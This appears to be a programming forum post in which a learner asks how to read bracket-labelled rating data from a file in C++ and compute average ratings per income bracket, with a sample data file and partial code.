Now I should imagine you’re all screaming now (and no, not because I don’t check “mode” isn’t null – this is demo code J). Truth is, I’d like the implementation of this to be different – perhaps by overriding WebFormViewFactory.GetTypeFromName, but some of the framework’s members are private and not virtual... hence my hack.
Basically all we do here is append the value of “mode” (which is “ajax” or “html”) to the end of the view name. So a request for a “List” view will return “List-ajax” or “List-html”. If we can’t find a View by this name, we fall back to the version without a suffix. [Important: The catching of exceptions in this way as effectively anticipated business logic is strongly not recommended – this is the ugly code I was referring to. This is hard to maintain and could easily become a performance hit if you have lots of Views without a suffix, so in production code I would put the effort in to handle this properly – I haven’t here simply to save space and complexity]. I then reuse the standard functionality of the WebFormViewFactory to do the hard work of creating an instance.
This should make it pretty obvious how you could change this behaviour to your heart’s content. There is no reason why you couldn’t completely remove any remnant of the WebFormViewFactory – as long as you return an instance of an IView you’re away!
The Controller Factory is almost embarrassingly simple;
public class AjaxControllerFactory : IControllerFactory
public IController CreateController(RequestContext context,
Type controllerType)
Controller controller =
(Controller)Activator.CreateInstance(controllerType);
controller.ViewFactory = new AjaxViewFactory();
return controller;
All we do here is create a new instance of our Controller, and make sure we set the View Factory to be an instance of our new class. The key to getting our new Controller Factory to be used instead of the default factory is a single call in the Application_Start event of Global.asax;
ControllerBuilder.Current.SetDefaultControllerFactory(
typeof(AjaxControllerFactory));
And that’s it.
To get my Views working I took the existing “People.aspx” View, and copied it twice to “People-ajax.aspx” and “People-html.aspx”. I then removed the if statement below;
<% if (ViewData.EnableAjax)
{ %>
<%= Ajax.UpdateRegionLink<AjaxSampleController>(d =>
d.UpdatePerson(emp.Id), "Individual", emp.Name) %>
<%}
else
<%= Html.ActionLink(emp.Name, new { action = "ViewPeople",
id = emp.Id })%>
<% } %>
... and instead left the relevant section in each View – i.e. the Ajax call in the “–ajax” view, and Html call in “-html” view.
Well folks, that’s all. I hope that’s a pretty clear demonstration of how easy it is to plug into the MVC pipeline. If you’re interested in IViewFactory specifically, head on over to MVCContrib – looks like some View Factories are in the code base. | http://blogs.msdn.com/b/simonince/archive/2008/02/04/multiple-views-with-mvc.aspx | CC-MAIN-2015-48 | refinedweb | 801 | 55.13 |
- was not declared in this scope
- no such a file or directory
- undefined reference to
- error while loading shared library, or cannot open shared object file
The thing is actually very simple: the compiler is not told to find the right file at the right place. The discussion below is based on Linux using GCC for C and C++.
Problem 1: Usually, this problem has nothing to do with your system settings or compiler configuration. It's a problem within your source code. On the top level, the function is not defined. The reason can vary.
was not declared in this scope
One reason is that the file declaring (or defining, if the declaration is done together with definition) the functions is not specified, e.g., the header file is not included. This can be easily fixed by including such a file in your source code.
Another reason is that you used the function beyond its class or namespace.
Problem 2:
No such a file or directory for a header file
If a header file is not found, the preprocessor or the preprocessor part of the compiler, will raise the error
No such a file or directory. Depends on where the header files are supposed to be at, there are different solutions.
Most C/C++ compiles treat the quote form of
#includeand angle-bracket form of
#includedifferently. Simply running
$ echo | gcc -E -Wp,-v -will tell you the difference:
#include "..." search starts here: #include <...> search starts here: /usr/lib/gcc/x86_64-linux-gnu/5/include /usr/local/include /usr/lib/gcc/x86_64-linux-gnu/5/include-fixed /usr/include/x86_64-linux-gnu /usr/include
Those directories listed under the section
#include <...> search starts here:are referred to as standard system directories [1]. They are from the convention of Linux systems' file hierarchy.
If you want to expand the search for angle-bracket form
#include<...>, use the
-Ioption. The preprocessor will search header files in directories followed by
-Ioption before searching system directories. Hence, a header file in a
-I-option directory will override its counterpart in system directories and be used to compile your code.
For quote form
#include"...", the preprocessor will first search in the current directory that the source file is at and then all the directories specified after the
-iquoteoption.
The example below will show you how
-Iand
-iquoteappend search paths:
l$ echo | gcc -iquote/home/forrest/Downloads -I/home/forrest/Dropbox -E -Wp,-v - #include "..." search starts here: /home/forrest/Downloads #include <...> search starts here: /home/forrest/Dropbox /usr/lib/gcc/x86_64-linux-gnu/5/include /usr/local/include /usr/lib/gcc/x86_64-linux-gnu/5/include-fixed /usr/include/x86_64-linux-gnu /usr/include
So, if you have the following macro in your code called
mycode.c:
#include < xyz.h> #include "abc/xyz.h"and your GCC command is like this
gcc mycode.c -I/opq/ -iquote/uvwthen the GCC's preprocessor (again, it's part of the GCC) will look for header files in the following full paths (on Ubuntu Linux 16.04) in addition to the search in system directories:
/opq/xyz.h /uvw/abc/xyz.hAccording to GCC document[1], it searches for header files in quote form
#include"..."before searching for angle-bracket form
#include"...".
Further specifications can be achieved using two other options
-isystemand
-idirafter. They are all well documented in GCC document[2].
Problem 3: You probably see an error like this
Undefined reference to
face.cpp:(.text._ZN2cv3Mat7releaseEv[_ZN2cv3Mat7releaseEv]+0x4b): undefined reference to `cv::Mat::deallocate()' collect2: error: ld returned 1 exit statusThis is a link-time error when the linker
ld, which is called automatically when you use GCC, cannot find the binary library that contains at least one function called by your code.
To fix, first tell the compiler (actually it's linker part) the path containing library files using the
-Loption [2] and then library file names using the
-loption [4]. If we denote the values after
-land
-Loptions as X and Y respectively, the compiler will search for every file called
libY.sounder every directory X. That's why on (almost) all Linux systems, a shared library file begins with
liband ends with the appendix
.so, such as
libopencv_core.so.
For example, the command
$ g++ face.cpp -L/opencv/lib -lopencv_core -lopencv_videoiowill ask the linker to find the following binary library files:
/opencv/lib/libopencv_core.so /opencv/lib/libopencv_videoio.so
Note that you may not be able to use some shell directives, such as
~after the
-Loption.
In most cases, you do not need to use the
-Land
-loptions because the compiler (again, its linker part) automatically searches in a set of system directories. When you have to, some tools can help you, such as pkg-config. I will write another blog post.
Problem 4:
error while loading shared libraries or
cannot open shared object file
Now, your program has been successfully compiled. When running it, you probably see an error like this:
./a.out: error while loading shared libraries: libopencv_core.so.3.3: cannot open shared object file: No such file or directoryThis problem is from the loader. Unlike the link-time error above, this problem is a run-time error. The shared library filenames are usually hardcoded into your binary program. To fix it, simply tell the loader where to find the specified shared library files. There are multiple ways.
Solution 1: Most Linux systems maintain an environment variable
LD_LIBRARY_PATHand the loader will search for binary library files requested by a program in all directories listed in
LD_LIBRARY_PATH, on top of a set of standard system directories, such as
/libor
/usr/lib. To set
LD_LIBRARY_PATHis like how you set any other environment variables, e.g., export on the Shell or edit and source
~/.bashrc.
Solution 2: Most Linux systems also maintains a shared library cache by a program called
ld-config. It remembers where to find the default location of each shared library file. Simply run
$ ldconfig -pit will tell you the mapping from shared library files to absolute paths in the system, e.g.,
2591 libs found in cache `/etc/ld.so.cache' libzzipwrap-0.so.13 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libzzipwrap-0.so.13 libzzipmmapped-0.so.13 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libzzipmmapped-0.so.13 libzzipfseeko-0.so.13 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libzzipfseeko-0.so.13
To change the mapping, simply edit
/etc/ld.so.confand then run
$ sudo ldconfigto rebuild the cache.
Solution 3: The two changes above are applied system-wide. A more flexible way is to specify the location of the shared libraries when linking your code using the
-Wl,-rpathoption, e.g.,
g++ face.cpp -idirafter ~/Downloads/opencv_TBB_install/include -L/home/forrest/Downloads/opencv_TBB_install/lib -lopencv_core -lopencv_objdetect -lopencv_highgui -lopencv_imgproc -lopencv_videoio -Wl,-rpath=/home/forrest/Downloads/opencv_TBB_install/lib
The disadvantage of Solution 3 is that if you change the location of the shared library, then you will run into error again.
References:
[1] Filesystem Hierarchy,
[2] GCC options for directories
[3] Shared Library How-To,
[4] GCC options for linking, | http://forrestbao.blogspot.com/2017/08/solution-to-most-not-found-or-undefined.html | CC-MAIN-2017-39 | refinedweb | 1,187 | 57.47 |
NBInclude is a package for the Julia language which allows you to include and execute IJulia (Julia-language Jupyter) notebook files just as you would include an ordinary Julia file. That is, analogous to doing
include("myfile.jl") in Julia to execute
myfile.jl, you can do
using NBInclude nbinclude("myfile.ipynb")
to execute all of the code cells in the IJulia notebook
myfile.ipynb. Similar to
include, the value of the last evaluated expression in the last evaluated code cell is returned.
The goal of this package is to make notebook files just as easy to incorporate into Julia programs as ordinary Julia (
.jl) files, giving you the advantages of a notebook (integrated code, formatted text, equations, graphics, and other results) while retaining the modularity and re-usability of
.jl files.
Key features of NBInclude are:
include.
myfile.ipynb:In[N]:Mfor line
Min input cell
Nof the
myfile.ipynbnotebook. Un-numbered cells (e.g. unevaluated cells) are given a number
+Nfor the
N-th nonempty cell in the notebook. You can use
nbinclude("myfile.ipynb", renumber=true)to automatically renumber the cells in sequence (as if you had selected Run All from the Jupyter Cell menu), without altering the file.
@__FILE__macro returns
/path/to/myfile.ipynb:In[N]for input cell
N.
include,
nbincludeworks fine with parallel Julia processes, even for worker processes (from Julia's
addprocs) that may not have filesystem access. (Do
import NBInclude; @everywhere using NBIncludeto use
nbincludeon all processes.)
;or
?are interpreted as shell commands or help requests, respectively. Such cells are ignored by
nbinclude.
countersand
regexkeywords can be used to include a subset of notebook cells to those for which
counter ∈ countersand the cell text matches
regex. For example,
nbinclude("notebook.ipynb"; counters=1:10, regex=r"#\s*EXECUTE")would include cells 1 to 10 from
notebook.ipynbthat contain comments like
# EXECUTE.
anshookcan be used to run a passed function on the return value of all the cells.
To install it, simply do
Pkg.add("NBInclude") as usual for Julia packages.
NBInclude was written by Steven G. Johnson and is free/open-source software under the MIT/Expat license. Please file bug reports and feature requests at the NBInclude github page.
10/10/2015
13 days ago
30 commits | https://juliaobserver.com/packages/NBInclude | CC-MAIN-2017-30 | refinedweb | 376 | 52.15 |
Introduction to Pandas left join
Pandas left join keep each column in the left dataframe. Where there are missing estimations of the on factor in the privilege dataframe, it includes void/NaN esteems in the outcome. The Pandas combine activity acts with an inward consolidation. An inward consolidation or internal join keeps just the regular qualities in both the left and right dataframes for the outcome. In our model above, just the lines that contain user id values that are regular among user usage and user device stay in the outcome dataset. We can approve this by taking a gander at what number of qualities are normal. In the yield/result, lines from the left and right dataframes are coordinated up where there are basic estimations of the joined section indicated by on.
Syntax and Parameters
Pandas.join(right,left,on=None,how='inner',right_on=None,left_on=None,right_index=False, left_index=False, sort=True)
Where,
- left and right indicate both the dataframe objects that has to be returned.
- on represents the segments or names to join on. Must be found in both the left and right DataFrame objects.
- left_on and right_on indicates the sections from the left and right DataFrame to use as keys. Can either be segment names or exhibits with length equivalent to the length of the DataFrame.
- left_index and right_index represents assuming True, utilize the record (column marks) from the left and right DataFrame as its join key. If there should arise an occurrence of a DataFrame with a MultiIndex (various levelled), the quantity of levels must match the quantity of join keys from the privilege DataFrame.
- sort indicates the outcome DataFrame by the join keys in lexicographical request. Defaults to True, setting to False will improve the exhibition significantly by and large.
How left join works in Pandas?
Given below shows how left join works in pandas:
Example #1
Code:
import pandas as pd
left = pd.DataFrame({
'id':[6,7,8,9,3],
'Name': ['Span', 'Vetts', 'Sucu', 'Appu', 'Sri'],
'subjects':['Mat','Sci','Soc','En','Kan']})
print (left)
Output:
In the above program, we first import the pandas library as pd and then define the dataframe. From the above dataframe, we use the left join function to print all the parameters of the dataframe and print the output.
Example #2
Code:
import pandas as pd
left = pd.DataFrame({
'Sr':[6,7,8,9,2],
'Name': ['Span', 'Suchu', 'Vetts', 'Appu', 'Sri'],
'subjects':['Math','Sci','Soc','Eng','Kan']})
right = pd.DataFrame({
'Sr':[6,7,8,9,2],
'Name': ['fil', 'mil', 'sil', 'pil', 'gil'],
'subjects':['Sans','Hin','Eng','Kan','Beng']})
print(pd.merge(left, right, on='Sr', how='left'))
Output:
In the above program, we first import pandas as pd and then we define the dataframe. After defining the dataframe, we use the merge function and pandas left join function to define only the left parameter and thus the output is as shown in the above snapshot.
We anticipate that the outcome should have indistinguishable number of lines from the left dataframe on the grounds that each use_id in user usage shows up just a single time in user device. A coordinated planning isn’t generally the situation. In blend activities where a solitary line in the left dataframe is coordinated by numerous columns in the privilege dataframe, different outcome lines will be produced. For example, on the off chance that a use_id esteem in user usage shows up twice in the user device dataframe, there will be two columns for that use_id in the join result.
You can change the converge to one side converge with the “how” boundary to your consolidation order. The head of the outcome dataframe contains the effectively coordinated things, and at the base contains the lines in user usage that didn’t have a comparing use_id in user device.
You could compose for circles for this errand. The first would circle through the use_id in the user_usage dataset, and afterward locate the correct component in user_devices. The second for circle will rehash this procedure for the gadgets. Be that as it may, utilizing for circles will be much increasingly slow verbose than utilizing Pandas consolidate usefulness. Thus, on the off chance that you go over this circumstance we do not use for circles.
There are connecting qualities between the example datasets that are essential to note – “use_id” is shared between the user usage and user device, and the “gadget” segment of user device and “Model” segment of the gadgets dataset contain basic codes.
Conclusion
Thus, we would like to conclude by stating that the join order is the key learning goal of this post. The combining activity at its least complex takes a left dataframe (the principal contention), a privilege dataframe which is the subsequent contention, and afterward a union segment name, or a segment to converge on. With this outcome, we would now be able to proceed onward to get the producer and model number from the “gadgets” dataset. Be that as it may, first we have to comprehend somewhat more about union kinds and the extents of the yield dataframe. The words “merge” and “join” are utilized generally conversely in Pandas and different dialects, to be specific SQL and R. In Pandas, there are discrete “union” and “join” capacities, the two of which do comparable things.
Recommended Articles
This is a guide to Pandas left join. Here we discuss the introduction to Pandas left join and how left join works with examples. You may also have a look at the following articles to learn more – | https://www.educba.com/pandas-left-join/?source=leftnav | CC-MAIN-2021-25 | refinedweb | 923 | 61.26 |
After a Python-based Spark cluster is created, you can submit a job. This topic uses a Python-based Spark job in an example.
Note: When you create a Python-based Spark cluster, you must use the image of version
spark_2_4_5_dla_0_0_2.
Python-based Spark is available in the China (Shenzhen) region and will be available in other regions.
1. Prepare the test data
Generate a CSV file named
staff.csv and upload it to Object Storage Service (OSS).
The CSV file lists the information and income of each employee.
name,age,gender,salary Lucky,25,male,100 Lucy,23,female,150 Martin,30,male,180 Rose,31,female,200
2. Develop a dependency method
To calculate the after-tax income of each employee, create a file named
func.py, write a
tax method to it, and register the method as a Spark user-defined function (UDF) to facilitate subsequent operations.
Sample code:
def tax(salary): """ convert string to int then cut 15% tax from the salary return a float number :param salary: The salary of staff worker :return: """ return 0.15 * int(salary)
To introduce the tax method by using
pyFiles, store the method in a ZIP-compressed package.
The following figure shows the directory structure of the compressed package.
Based on Python syntax, a module named
tools is created, and the
func.tax method is stored under the tools module.
Compress the depend folder as
depend.zip and upload the package to OSS.
3. Develop the main program
Develop a Python-based Spark program to read the data in the CSV file from OSS, and register the CSV file as a
DataFrame. Register the
tax method in the depend.zip dependency package as a
Spark UDF. Then, use the
Spark UDF to calculate the
DataFrame and generate the results.
Replace
{your bucket} with the name of your OSS bucket in the following sample code:
from __future__ import print_function from pyspark.sql import SparkSession from pyspark.sql.functions import udf from pyspark.sql.types import FloatType # import third part file from tools import func if __name__ == "__main__": # init pyspark context spark = SparkSession\ .builder\ .appName("Python Example")\ .getOrCreate() # read csv from oss to a dataframe, show the table df = spark.read.csv('oss://{your bucket}/staff.csv', mode="DROPMALFORMED",inferSchema=True, header = True) # print schema and data to the console df.printSchema() df.show() # create an udf taxCut = udf(lambda salary: func.tax(salary), FloatType()) # cut tax from salary and show result df.select("name", taxCut("salary").alias("final salary")).show() spark.stop()
Write the preceding code to the
example.py file and upload the file to OSS.
4. Submit the job
Create a cluster. When you create the cluster, select the latest Spark image version
spark_2_4_5_dla_0_0_2.
In the left-side navigation pane of the DLA console, choose Serverless Spark > Submit job. On the page that appears, click Create Job. In the dialog box that appears, complete the settings and submit the following job information:
{ "name": "Spark Python", "file": "oss://{your bucket name}/example.py", "pyFiles": ["oss://{your bucket name}/depend.zip"], "conf": { "spark.driver.resourceSpec": "small", "spark.executor.instances": 2, "spark.executor.resourceSpec": "small", "spark.dla.connectors": "oss", "spark.kubernetes.pyspark.pythonVersion": "3" } }
Replace
{your bucket name} with the name of your OSS bucket. In this example, Python 3 is used to run this job. You can specify the
spark.kubernetes.pyspark.pythonVersion parameter to decide which version of Python is used the same as what you do to Spark community versions. If you do not specify this parameter, Python 2.7 is used. | https://www.alibabacloud.com/help/doc-detail/173152.htm | CC-MAIN-2020-40 | refinedweb | 594 | 60.61 |
I think everyone who ever worked with big data is already familiar with the Hadoop clusters. There are many Hadoop distributions available, like the HortonWorks or Cloudera. But you can also provision the cluster in the Cloud. Microsoft Azure offers service called HDInsights that can be used to quickly spin up a big data clusters without thinking about underlying infrastructure. It seamlessly integrates with Azure Data Lake Storage or Azure Storage Account creating a resilient and cost-effective solution. If you prefer PaaS services as I do, then you should definitely check it out.
But the reason to write this post is not to list the advantages of the HDInsight over other Hadoop distributions. In my last two posts, I focused on the SAP DataHub and if you read one of Frank’s Schuler articles about its architecture then you already know that the integral part of the solution is SAP Vora. And as the HDInsight meets the SAP Vora requirement I was wondering if I can enable integration between those two products.
The SAP Data Hub and SAP Vora run on Kubernetes engine and if you’d like to follow this guide I highly recommend to use my previous post where I describe how to make it running in Azure.
To enable the integration between SAP Vora and the Hadoop cluster we need to install the Spark extension available to download from SAP Launchpad. Depending if you’re running a pure Vora or the DataHub + Vora you should download the correct package:
SAP Vora 2 Spark Extension – when you have a pure SAP Vora installation
SAP Data Hub Spark Extension – when working with SAP Data Hub
There are a few differences between those products but in most cases, it uses the same code base. The major difference I noticed is different handling of authentication, as the SAP Data Hub implements multitenancy. In the following guide, I will focus on the SAP Data Hub extension, but the steps in the majority will work exactly the same for the SAP Vora plug-in. To get a full understanding of how to implement the connection I decided to follow the manual installation mode. As always I recommend getting familiar with the Installation Guide which contains much valuable information.
PROVISION HDINSIGHT CLUSTER
I think deployment of HDInsight cluster is quite complex compared to other Azure PaaS services and requires a bit of Hadoop understanding. But if you follow my steps you should not encounter any issues. The very first question to consider is what sort of the HDInsight cluster you need. The Azure choice is quite large and you can choose from seven different configurations that include solution optimized for data analytics (Spark), NoSQL (HBase) or messaging (Kafka).
When creating an HDInsight cluster in Hadoop I found it better to switch to the Custom settings as it gives much more control over the server configuration. As I want to focus on the data analytics I decided to go with the Spark cluster. If you choose a different type there it may be required to perform additional configuration.
Let’s begin! Open HDInsight from the available services and choose the name of the cluster. Type the default password, which will be used also to connect to the cluster nodes through SSH.
The second step focuses on the networking so I choose to connect the service to my default VNet – it will simplify the connection to the SAP Vora. To separate the traffic between different Azure services I created additional subnet just for HDInsight workload:
The thirds step is all about the storage. There is a significant difference between HDInsight and other Hadoop distributions. Usually the storage is distributed across nodes that belong to the cluster, but HDInsight natively integrates with Data Lake or Storage Account. Such implementation have a number of benefits like lower cost of storing the data or possibility to destroy the cluster and keeping the data at the same time.
You can choose to use the ADLS or the Storage Account as the underlying file system. I decided to go with the Data Lake as it’s optimized for parallel processing and therefore suits the HDInsight better. The blob storage has certain limitations, like the maximum available space.
There is also a requirement to configure the Service Principal to enable access to ADLS storage. You can create the account directly in the portal. The advantage is that it automatically creates the certificate that will be used for authentication which makes the process easier.
The service principal requires POSIX (rwx) permissions to read and write to Data Lake storage. Click on the Access entry and you’ll be redirected to a wizard, where you select the account and choose permissions.
Confirm by clicking Select and choose Run on the next screen.
Leave the default settings on the optional step Application and stop for a moment when deciding about the cluster size. Depending on the usage and resiliency requirements you can choose how many worker nodes you want to deploy. As I will use the cluster just for testing purposes I decided to go with a single worker node. You can adjust the number and the size of nodes after the cluster is provisioned. To ensure the system is highly available you can’t decrease the number of head nodes below two.
You don’t have to maintain any custom script actions in the sixth step so you can jump to cluster validation and deployment:
INSTALL SAP DATA HUB SPARK EXTENSION
After around 20 minutes the cluster is deployed and we can start the installation of the Spark extension. You can log in to the operating system of the master node using the following command:
ssh <username>@<cluster_name>-ssh.azurehdinsight.net
Execute following commands to list all nodes that belongs to the cluster:
export CLUSTERNAME=<cluster_name> curl -u admin -sS -G "" | jq '.items[].Hosts.host_name'
Download the Spark extension to a temp directory and unzip the file. We need to upload the spark-sap-datasources-spark2.jar to ADLS filesystem and then we will write a script that will distribute the file to all HDInsight nodes.
unzip DHSPARKINT04_1-70003482.ZIP hadoop fs -mkdir /SAPVora/ hadoop fs -put SAPDataHub-SparkExtension/spark-sap-datasources-spark2.jar /SAPVora/
Now create a script that will distribute the file to each cluster node and upload it to the ADLS:
vi distribute-Spark.sh #!/bin/bash mkdir /opt/SAPVora/ hadoop fs -get /SAPVora/spark-sap-datasources-spark2.jar /opt/SAPVora/
We can automate the distribution the file the Spark extension file using the HDInsight Script Action. Go to Azure portal and open the cluster configuration. Choose Script Action from the menu and click Submit New.
The script type should be set to Custom. Type the desired script name. The uploaded script URL follows the format:
adl://<ADLS_name>.azuredatalakestore.net/clusters/<cluster_name>/SAPVora/distribute-Spark.sh
The script should be executed on head nodes and worker nodes.
It takes a few seconds to execute the script. If everything went well, you will see a green mark next to the script name:
You can verify the file exists on the master node:
ls -ltr /opt/SAPVora
CONFIGURE SPARK
The first step in order to configure the SAP Data Hub Spark Extension is to identify the hostname and the port number of the tx-coordinator service on the SAP Data Hub cluster.
Log in to the Kubernetes cluster dashboard using following PowerShell command from your local computer:
az aks browse --resource-group <AKS_Resource_Group> --name <AKS_Name>
In the Kubernetes Dashboard click on Services and find the vora-tx-coordinator-ext service.
You’re interested in the node hostname and the endpoint port
Note: your SAP Vora and the HDInsight cluster have to be able to communicate with each other. My scenario uses the same VNet for both services, but if that’s not the case for you, you should expose the vora-tx-coordinator-ext externally.
Now we can configure the Spark2 component through the Ambari UI, which can be accessed through a web browser. The URL follows the format:
https://<cluster_name>.azurehdinsight.net
Do not enter the configuration directly to the files on the nodes, as whenever you restart the Spark service the settings will be overwritten.
Click on Spark2 and then choose Configs from the top menu. In the long list of files find Custom spark2-defaults. Add bellow parameters:
Save the settings and restart affected services. We can now validate the connection between HDInsight and the SAP Vora. Go back to the Master Node of the Hadoop cluster and launch Scala:
spark-shell --jars /opt/SAPVora/spark-sap-datasources-spark2.jar
Execute following commands in the editor:)
If the above commands were executed successfully and you didn’t receive any exceptions it means the installation is complete and we can try to execute a more advanced test!
LOAD DATA TO SAP VORA AND ACCESS THEM IN SPARK
Currently, SAP Vora extension for Spark doesn’t support Data Lake authentication using certificates, therefore we need to set up a new Service Principal that will be used to access the ADLS from the Vora tools. If you have followed my previous post about extracting data you can re-use the same username and password. If not, then execute the following script:
$SPName = "dataextractSP" $URI = "http://" + $SPName $app = New-AzADApplication -DisplayName $SPName -IdentifierUris $URI $servicePrincipal = New-AzADServicePrincipal -ApplicationId $app.ApplicationId $BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($servicePrincipal.Secret) $password = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR) [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($BSTR) $tenant = Get-AzTenant Write-Host '' Write-Host 'Below information will be required during SAP Data Hub configuration:' Write-Host 'Service Principal Name :' $SPName Write-Host 'Service Principal Tenant ID :' $tenant.Id Write-Host 'Service Principal Client ID :' $app.ApplicationId Write-Host 'Service Principal Key :' $password
Assign the full permissions to the Data Lake in Azure Portal. There is an option that I selected to save the permissions as default. Otherwise, if you create new files or directories the service principal won’t inherit the access from the parent.
Log in to HDInsight through SSH and download the test dataset containing airports from around the world and upload it to the Azure Data Lake:
wget
Now log in to the SAP Vora Tools and create a new relational table using the service principal credentials and pointing to the downloaded file:
In the next step I corrected the columns names and the data types. I think SAP Vora tries to identify the correct data type based on the first row only (which is a bad idea) so initially I run into many mapping issues. But after setting below parameters the import went fine.
You can see a data preview in the Vora Tools:
Now let’s try to access the table in Spark and do some operations. Open Spark and establish a connection with SAP Vora as we did before. But this time instead of selecting a dummy data I will display a few rows from the uploaded dataset.
spark-shell --jars /opt/SAPVora/spark-sap-datasources-spark2.jar import sap.spark.vora.PublicVoraClientUtils import sap.spark.vora.config.VoraParameters val client = PublicVoraClientUtils.createClient(spark) client.query("""select "Country", "IATACode", "Name", "City" from "default"."airports" where "Country"='Poland'""").foreach(println)
Let’s import that list to a DataFrame count the rows:
val airport_DF = spark.read. format("sap.spark.vora"). option("table", "airports"). option("namespace", "default"). load()
We can save the DataFrame to Hive Metastore:
airport_DF.write. format("orc"). saveAsTable("airport_orc") spark.sql("""SELECT * FROM airportxxx_orc WHERE COUNTRY='Poland'""").show()
And to finish I’m going to create a table in SAP Vora and transfer subset of data from the Hive metastore.
import org.apache.spark.sql.SaveMode client.execute("""CREATE TABLE "default"."airports_poland" ("City" VARCHAR(40), "Name" VARCHAR(70), "ICAOCode" CHAR(4)) TYPE STREAMING STORE ON DISK""") val airports_poland_DF = spark.sql("""SELECT City, Name, ICAOCode FROM airport_orc WHERE COUNTRY='Poland'""") airports_poland_DF.count() airports_poland_DF.show() airports_poland_DF.write. format("sap.spark.vora"). option("table", "airports_poland"). option("namespace", "default"). mode(SaveMode.Append). save()
You can verify the table exist in the SAP Vora Tools:
ACCESS SAP VORA FROM THE HANA DATABASE
There is one more thing I would like to present. The big advantage of the SAP VORA is that it can expose the data stored in the Hadoop cluster to the SAP HANA database. We have a sample data uploaded to the storage, so let’s try to set up the connection.
The SAP HANA Wire protocol is enabled by default on the SAP Vora installation, so we just need to configure the remote connection in SAP HANA. You can get the endpoint details from the Kubernetes Dashboard. The vora-tx-coordinator-ext service expose additional port that should be used:
To create a remote connection, you can either use SQL command or the SAP HANA Studio.
CREATE REMOTE SOURCE HDInsight_VORA ADAPTER "voraodbc" CONFIGURATION 'ServerNode=<hostname>:<port>;Driver=libodbcHDB;sslValidateCertificate=false;encrypt=true' WITH CREDENTIAL TYPE 'PASSWORD' USING 'user=<tenant>\<username>;password="<password>"';
You can also do it fromt the HANA studio:
Now I’m able to create a virtual table:
And display the data preview:
The test is completed. As you can see the integration between the HDInsight and the SAP Vora works without any issues and you can easily access the tables from the Spark or HANA database. If you are interested in building more advanced applications check out the SAP Vora Developer Guide.
Really nice article, i really enjoyed the information you shared | https://blogs.sap.com/2019/04/17/your-sap-on-azure-part-15-connect-sap-vora-with-azure-hdinsight/ | CC-MAIN-2021-25 | refinedweb | 2,249 | 52.9 |
How to: Add Filter Controls to a Simple List Form
Applies To: Microsoft Dynamics AX 2012 R3, Microsoft Dynamics AX 2012 R2, Microsoft Dynamics AX 2012 Feature Pack, Microsoft Dynamics AX 2012
A simple list or simple list and detail form can include a custom filter group. You use controls in the custom filter group to specify field values. The grid then lists the records that include the specified values. However, a custom filter is optional and is not included on all simple list or simple list and details forms. For more information, see Simple List Forms Overview.
To enable a form to be filtered, you add one or more controls to the custom filter group of the form. Typically, the custom filter group appears under the action pane strip and the optional page title group. To learn about the page title group, see How to: Add a Page Title Group to a Simple List Form.
To add the custom filter group
In the AOT, expand Forms, and then expand the form where you want to add the custom filter group.
Note
If you use a template to create the simple list or simple list and details form, a custom filter group control was already added to the Design node of the form. To use the existing filter group, go to the procedure that describes how to add a control to the group.
Expand Designs, right-click Design, click New Control, and then click Group. A group control is added to the form. Use the ALT+UP ARROW or ALT+DOWN ARROW to move the group. Move the custom filter group so that it appears under the action pane control. If the form includes a page title group, move the custom filter group under the page title group.
Right-click the group control, and then click Properties. In the properties sheet, verify the following property values:
Right-click the form and then click Save.
To add a control to the custom filter group
In the AOT, expand Forms, and then expand the form where you want to add fields to the filter group.
Expand Designs, expand Design, right-click CustomFilterGroup, click New Control, and then click the type of control you want to use. The control is added to the group.
For example, click ComboBox to add a field that you can use to show enum or EDT values. To specify the values that appear in the control, use the EnumType or ExtendedDataType property. For example, the filter control of the BudgetTransactionInquiry form sets the EnumType property to AllDraftCompleted.
Expand the control node, right-click Methods, click Override methods, and then click modified. The method opens in the code editor.
Add code to the method that updates the form by using the specified filter value. Add the code after the call to super in the modified method.
The following code example shows how to refresh the form after a value is selected in the filter control. In this example, Table1_ds is the data source for the form. To follow the example, you would replace Table1_ds with the name of the table in the data source of the form.
public boolean modified() { boolean ret; ret = super(); // A new filter value has been selected; refresh the form using that filter value. Table1_ds.executeQuery(); return ret; }
To use the control value to filter the form
Expand the Methods node of the form, right-click classDeclaration, and then click View Code. The method opens in the Editor window.
In the classDeclaration method, declare a variable of type QueryFilter. The following code example shows how to declare a variable named queryFilter.
public class FormRun extends ObjectRun { QueryFilter queryFilter; }
Expand the Data Sources node, and then find the table that has the field that has the values that you will use to filter the list.
Expand the table node, right-click Methods, click Override method, and then click init. The method opens in the Editor window.
Use the addQueryFilter method of the data source query to initialize queryFilter. Add your code after the call to super. Use the addQueryFilter method to specify the table and field you will use to filter the list. The method returns a QueryFilter object. For information about the QueryFilter class, see How to: Use the QueryFilter Class with Outer Joins.
The following code example initializes queryFilter. In this example, Table1_ds represents the data source for the form. In addition, relatedID specifies the name of a field in Table1. To follow the example, replace Table1_ds and relatedID with the name of a table and a field from the data source of the form.
public void init() { super(); // Add a filter to the query. Specify the field to use in the filter. queryFilter = Table1_ds.query().addQueryFilter(Table1_ds.queryBuildDataSource(),"relatedID"); }
In the same table, right-click the Methods, click Override method, and then click executeQuery. The method opens in the Editor window.
Associate the value of the filter group control you added earlier with the queryFilter object. Add your code before the call to super.
The following code example uses the value of a control named ComboBox to specify the value for the queryFilter object. To follow the example, replace ComboBox with name of the filter control you added earlier.
public void executeQuery() { // Get the filter value from the filter control. queryFilter.value(element.design().controlName("ComboBox").valueStr()); super(); }
Note
If you find the filter creates a new record when you expect the form to be empty. Set the ViewEditMode property in the Design node of the form to View.
Right-click the form, and then click Save.
See also
How to: Create a Simple List Form
How to: Create a Simple List and Details Form
Announcements: New book: "Inside Microsoft Dynamics AX 2012 R3" now available. Get your copy at the MS Press Store. | https://docs.microsoft.com/en-us/dynamicsax-2012/developer/how-to-add-filter-controls-to-a-simple-list-form?redirectedfrom=MSDN | CC-MAIN-2022-27 | refinedweb | 971 | 64.41 |
Hello,
I am trying to figure out how or what looping method
to use to read multiple data from a file.
The file has several income brackets (A, B, & C), and some ratings for product1 and product2.
The data file looks like this:
What I want to do is read in and calculate the average rating for product 1 (the first number)What I want to do is read in and calculate the average rating for product 1 (the first number)Code:A 5 7 A 4 8 A 3 9 B 2 7 C 1 6 C 8 2 A 7 5 B 6 9
that bracket A rated, then bracket B,
and finally C.
